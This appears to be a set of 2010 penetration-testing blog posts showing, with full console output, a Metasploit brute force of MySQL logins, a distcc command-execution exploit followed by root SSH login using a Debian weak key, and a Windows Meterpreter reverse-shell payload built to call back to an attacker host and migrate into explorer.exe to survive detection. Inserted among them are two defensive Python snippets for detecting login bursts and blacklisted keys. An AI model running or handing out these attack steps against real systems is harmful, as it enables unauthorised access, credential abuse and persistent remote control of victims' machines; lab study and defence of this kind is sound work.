Bruteforce MySQL Using Metasploit…

July 3, 2010 at 11:52 am (Metasploit, Security)

Hey guys,

I will demonstrate how to brute-force MySQL logins using Metasploit. This is another attack against the Metasploitable distribution I mentioned in my previous post. It is very simple and shouldn’t take long to demonstrate, so here goes:

root@bt:/pentest/exploits/framework3# ./msfconsole



=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...

Auxiliary
=========

Name                         Rank    Description
----                         ----    -----------
admin/mysql/mysql_enum       normal  MySQL Enumeration Module
admin/mysql/mysql_sql        normal  MySQL SQL Generic Query
admin/tikiwiki/tikidblib     normal  TikiWiki information disclosure
scanner/mysql/mysql_login    normal  MySQL Login Utility
scanner/mysql/mysql_version  normal  MySQL Server Version Enumeration

Exploits
========

Name                             Rank     Description
----                             ----     -----------
linux/mysql/mysql_yassl_getname  good     MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello    good     MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello  average  MySQL yaSSL SSL Hello Message Buffer Overflow

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   true             yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             3306             yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options

Module options:

Name              Current Setting     Required  Description
----              ---------------     --------  -----------
BLANK_PASSWORDS   true                yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                   yes       How fast to bruteforce, from 0 to 5
PASSWORD                              no        A specific password to authenticate with
PASS_FILE         /root/password.txt  no        File containing passwords, one per line
RHOSTS            10.113.8.102        yes       The target address range or CIDR identifier
RPORT             3306                yes       The target port
STOP_ON_SUCCESS   false               yes       Stop guessing when a credential works for a host
THREADS           1                   yes       The number of concurrent threads
USERNAME                              no        A specific username to authenticate as
USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
USER_FILE         /root/users.txt     no        File containing usernames, one per line
VERBOSE           true                yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > exploit

[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Bingo! We found the root password, which is simply ‘root’ 🙂 Now let’s double-check this:

root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)

mysql>

Now we have complete control over their database, yay! 🙂
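Seen from the server side, the scan above is a burst of failed logins from one client, first with blank passwords for every user and then with a wordlist. The following is an added example (my code, not the post's or Metasploit's) that flags that pattern in a MySQL 5.x error log, which records these access-denied warnings when log_warnings is set above 1; the log excerpt and the scanning host's address are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed MySQL 5.x error-log excerpt (YYMMDD HH:MM:SS [Warning] ...); the client
# address stands in for the scanning host and is made up.
SAMPLE_LOG = """\
100703 11:52:01 [Warning] Access denied for user 'admin'@'10.113.10.116' (using password: NO)
100703 11:52:01 [Warning] Access denied for user 'root'@'10.113.10.116' (using password: NO)
100703 11:52:02 [Warning] Access denied for user 'god'@'10.113.10.116' (using password: NO)
100703 11:52:02 [Warning] Access denied for user 'daemon'@'10.113.10.116' (using password: NO)
100703 11:52:03 [Warning] Access denied for user 'admin'@'10.113.10.116' (using password: YES)
100703 11:52:03 [Warning] Access denied for user 'root'@'10.113.10.116' (using password: YES)
100703 12:30:07 [Warning] Access denied for user 'webapp'@'10.113.8.50' (using password: YES)
"""

# Only access-denied lines are of interest; everything else in the log is skipped.
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)' \(using password: (?P<pw>YES|NO)\)$")

def parse_line(line):
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(" ".join(m["ts"].split()), "%y%m%d %H:%M:%S")  # hour may be space-padded
    return {"ts": ts, "user": m["user"], "host": m["host"], "used_password": m["pw"] == "YES"}

def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """One alert per client host that reaches `threshold` failures inside a sliding window."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # host -> failures still inside the window
    alerts = {}                  # host -> running summary of the burst
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        q = recent[ev["host"]]
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > window:  # age out old failures
            q.popleft()
        summary = alerts.get(ev["host"])
        if summary is None and len(q) < threshold:
            continue
        if summary is None:  # threshold just crossed: open the alert with the whole window
            summary = alerts[ev["host"]] = {"host": ev["host"], "first_seen": q[0]["ts"],
                                            "failures": 0, "users": set(), "blank_password_attempts": 0}
            burst = list(q)
        else:                # already alerted: keep counting the follow-on failures
            burst = [ev]
        for e in burst:
            summary["failures"] += 1
            summary["users"].add(e["user"])
            summary["blank_password_attempts"] += 0 if e["used_password"] else 1
    return list(alerts.values())
```

The blank-password count and the number of distinct usernames in one burst separate a scanner like mysql_login from a single user mistyping a password.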


Hacking distcc with Metasploit…

July 3, 2010 at 11:27 am (Metasploit, Security)

Hey,

I have been playing around with Metasploitable. This is a deliberately vulnerable test system produced by the Metasploit team. One of the services it is running is distcc. Today I will show you how to own it using Metasploit…

First of all we shall start with a port scan of the system:

root@bt:~# nmap -sV -sS -p1-65535 10.113.8.102

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-03 11:04 BST
Nmap scan report for ml-dkelly.messagelabs.com (10.113.8.102)
Host is up (0.0034s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:9F:54:C9 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds
root@bt:~#

We are most interested in the following line:

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Right, so let’s fire up Metasploit then:

root@bt:/pentest/exploits/framework3# ./msfconsole



=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search distcc
[*] Searching loaded modules for pattern ‘distcc’…

Exploits
========

Name Rank Description
---- ---- -----------
unix/misc/distcc_exec excellent DistCC Daemon Command Execution

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3632             yes       The target port


Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > set RHOST 10.113.8.102
RHOST => 10.113.8.102
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

Name                   Rank    Description
----                   ----    -----------
cmd/unix/bind_perl     normal  Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby     normal  Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic       normal  Unix Command, Generic command execution
cmd/unix/reverse       normal  Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl  normal  Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby  normal  Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options

Module options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  10.113.8.102     yes       The target address
RPORT  3632             yes       The target port

Payload options (cmd/unix/bind_perl):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST  10.113.8.102     no        The target address

Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (10.113.10.116:55064 -> 10.113.8.102:4444) at Sat Jul 03 11:54:29 +0100 2010

whoami; uname -ar
daemon
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Excellent, so we managed to get a bind shell working and now have command execution on the target system. But what else can we do? Well, we should be able to use their SSH key and log in as root, since that authorized_keys entry is one of the predictable keys produced by the Debian OpenSSL weak-key bug. First we must download debian_ssh_rsa_2048_x86.tar.bz2. You can quickly pop that into Google and find a place to download it. Once you have downloaded it, uncompress it, then perform the following steps:

* SNIP *
rsa/2048/22395760ea6265919ef5db8d26dda56c-17578
rsa/2048/e311fc52da0d062cd6e9a507a7470db8-15835.pub
rsa/2048/ae88b6e25a832541ac60978e90fb40fe-28014
rsa/2048/759ee1c853d2fcc07a13e6867ed75a35-26843
rsa/2048/22817b9fcfca9c043d6d48dac528b0a6-3298
rsa/2048/cd84c0196af31046b45037f39208c9c1-11710
rsa/2048/9634a42c34d72e776593a9f1ddd38085-2633
rsa/2048/1668b5d4171480a6359c0966ded47550-15730
rsa/2048/b8a7774ef9e5b9b2b73a685e509b899b-2131
root@bt:~/rsa/2048# grep -lir AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

57c3115d77c56390332dc5c49978627a-5429.pub
root@bt:~/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.113.8.102
Last login: Sat Jul 3 07:01:04 2010 from 10.113.10.116
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

So we managed to get a shell on the vulnerable system 🙂
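The login works only because the key in root's authorized_keys is on the weak-key list, so the administrator's counterpart to the grep above is to fingerprint every authorized key and compare it against a blacklist (Debian shipped ssh-vulnkey for this). The following added example (my code, not the post's or Debian's) parses the page's key out of a constructed authorized_keys file, checks its wire-format structure, and looks its MD5 fingerprint up in a hypothetical blacklist set; the on-disk format of the real Debian blacklist files is not reproduced.

```python
import base64
import hashlib
import struct
KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256"}

# Constructed authorized_keys file: the first entry is the key recovered on the page, the
# second has an options prefix and a deliberately broken key blob.
AUTHORIZED_KEYS = """\
# root's authorized_keys (constructed sample)
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
from="10.113.0.0/16" ssh-rsa notbase64!!! broken-entry
"""

def read_ssh_string(blob, offset):
    """Read one uint32-length-prefixed field of the SSH wire format."""
    if offset + 4 > len(blob):
        raise ValueError("truncated length field")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    end = offset + 4 + length
    if end > len(blob):
        raise ValueError("truncated field body")
    return blob[offset + 4:end], end

def parse_rsa_pubkey(b64):
    """Decode an ssh-rsa blob into exponent, modulus size and MD5 fingerprint."""
    blob = base64.b64decode(b64, validate=True)
    ktype, off = read_ssh_string(blob, 0)
    if ktype != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key: %r" % ktype)
    e_bytes, off = read_ssh_string(blob, off)
    n_bytes, off = read_ssh_string(blob, off)
    if off != len(blob):
        raise ValueError("trailing data after modulus")
    digest = hashlib.md5(blob).hexdigest()  # same digest ssh-keygen -l -E md5 shows
    return {"e": int.from_bytes(e_bytes, "big"), "bits": int.from_bytes(n_bytes, "big").bit_length(),
            "md5": ":".join(digest[i:i + 2] for i in range(0, 32, 2))}

def audit_authorized_keys(text, blacklist):
    """One finding per entry: 'weak' if its fingerprint is blacklisted, 'ok', or 'error'."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        # Entries may carry an options prefix (from=, command=, ...), so locate the key type.
        try:
            idx = next(i for i, t in enumerate(tokens) if t in KEY_TYPES)
            comment = " ".join(tokens[idx + 2:])
            info = parse_rsa_pubkey(tokens[idx + 1])
        except (StopIteration, IndexError, ValueError) as exc:
            findings.append({"line": lineno, "status": "error", "detail": repr(exc)})
            continue
        findings.append({"line": lineno, "status": "weak" if info["md5"] in blacklist else "ok",
                         "comment": comment, **info})
    return findings
```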


Payloads and Metasploit

May 31, 2010 at 8:57 pm (Metasploit, Security)

Hey,

I have been playing around with the Metasploit Framework over the weekend. Something I found rather interesting was the msfpayload tool. I will show you how to create a TCP reverse-connect shell for Windows machines. Be aware that these binaries will be detected by anti-virus software. There are quite a lot of tutorials around on the web that talk about making binaries undetectable to anti-virus software. Maybe in the not so distant future I will write a post about it, but for now, on to creating the payload…

root@bt:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.65 LPORT=4444 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.1.65,LPORT=4444
root@bt:/pentest/exploits/framework3#

This will create a binary called payload.exe which, when an unsuspecting user runs it, opens a TCP connection back to 192.168.1.65 on port 4444. On that machine you want the following already running:

root@bt:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 263 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
=[ svn r9381 updated today (2010.05.30)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.65
LHOST => 192.168.1.65
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.65:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.65:4444 -> 192.168.1.64:61267) at Mon May 31 21:38:53 +0100 2010

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System
272 smss.exe
372 csrss.exe
424 wininit.exe
456 csrss.exe
480 services.exe
520 winlogon.exe
532 lsass.exe
540 lsm.exe
656 svchost.exe
720 nvvsvc.exe
760 svchost.exe
848 svchost.exe
916 svchost.exe
944 svchost.exe
360 svchost.exe
1016 nvvsvc.exe
1148 svchost.exe
1328 spoolsv.exe
1356 svchost.exe
1532 MDM.EXE
1584 ccsvchst.exe
1664 vmware-usbarbitrator.exe
1244 vmnat.exe
1232 vmware-authd.exe
1808 taskhost.exe x64 1 workstation\zoidberg C:\Windows\System32\taskhost.exe
1108 ccsvchst.exe x86 1
1684 vmnetdhcp.exe
2696 svchost.exe
204 dwm.exe x64 1 workstation\zoidberg C:\Windows\System32\dwm.exe
2852 explorer.exe x64 1 workstation\zoidberg C:\Windows\explorer.exe
2916 sidebar.exe x64 1 workstation\zoidberg C:\Program Files\Windows Sidebar\sidebar.exe
364 jusched.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
732 hqtray.exe x86 1 workstation\zoidberg C:\Program Files (x86)\VMware\VMware Player\hqtray.exe
2404 SearchIndexer.exe
2036 svchost.exe
3144 wmpnetwk.exe
3228 svchost.exe
3840 Azureus.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Vuze\Azureus.exe
2936 firefox.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Mozilla Firefox\firefox.exe
612 SearchProtocolHost.exe
1088 SearchFilterHost.exe
2408 cmd.exe x64 1 workstation\zoidberg C:\Windows\System32\cmd.exe
2676 conhost.exe x64 1 workstation\zoidberg C:\Windows\System32\conhost.exe
4052 payload.exe x86 1 workstation\zoidberg C:\Users\zoidberg\Downloads\payload.exe
3360 NETSTAT.EXE x64 1 workstation\zoidberg C:\Windows\System32\NETSTAT.EXE
3772 Bubbles.scr x64 1 workstation\zoidberg C:\Windows\System32\Bubbles.scr

meterpreter > migrate 2852
[*] Migrating to 2852...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer: WORKSTATION
OS : Windows 7 (Build 7600, ).
Arch : x64
Language: en_GB
meterpreter >

As you can see, the handler sits there waiting for a connection on port 4444; when it receives one, it drops into a Meterpreter shell.

Issuing the migrate <pid> command above in the Meterpreter shell moves the session out of the process of the binary we originally connected through and into the explorer.exe process (the currently logged-in user's session process). So now our Meterpreter shell will stay open until the user logs out. This is a good trick in case the user notices that the binary was malicious and kills any abnormal processes.
